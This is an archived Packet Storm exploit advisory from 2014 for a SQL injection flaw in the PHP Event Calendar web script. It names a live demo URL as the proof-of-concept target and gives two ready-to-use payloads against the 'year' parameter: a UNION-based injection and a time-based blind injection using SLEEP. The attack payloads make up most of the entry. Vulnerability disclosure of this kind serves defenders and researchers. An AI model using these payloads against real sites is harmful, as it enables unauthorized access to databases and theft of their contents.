Lucene search

K
packetstormDaniel GodoyPACKETSTORM:126149
HistoryApr 14, 2014 - 12:00 a.m.

PHP Event Calendar SQL Injection

2014-04-1400:00:00
Daniel Godoy
packetstormsecurity.com
15
`# Exploit Title: PHP Event Calendar / SQL Injection Vulnerability#  
Date: 14/04/2014# Author: Daniel Godoy# Author Mail:  
danielgodoy[at]GobiernoFederal[dot]com# Author Web:  
www.delincuentedigital.com.ar# Software: PHP Event Calendar# Software  
Link: http://codecanyon.net/item/php-event-calendar/47723# Tested on:  
Linux  
[Comment]Greetz: Ariel Orellana www.remoteexecution.net  
www.remoteexcution.com.ar [PoC] http://envato.jigowatt.co.uk/code/calendar/day_view.php?day=23&month=4&year=2014  
Place: GETParameter: year Type: UNION query Title: MySQL  
UNION query (NULL) - 1 to 10 columns Payload:  
day=23&month=4&year=2014' UNION ALL SELECT NULL, NULL, NULL, NULL,  
NULL, NULL,  
CONCAT(CHAR(58,100,120,121,58),IFNULL(CAST(CHAR(113,68,117,66,112,104,104,66,114,109)  
AS CHAR),CHAR(32)),CHAR(58,115,104,115,58)), NULL# AND 'JNPR'='JNPR  
Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND  
time-based blind Payload: day=23&month=4&year=2014' AND SLEEP(5)  
AND 'PIGb'='PIGb  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
`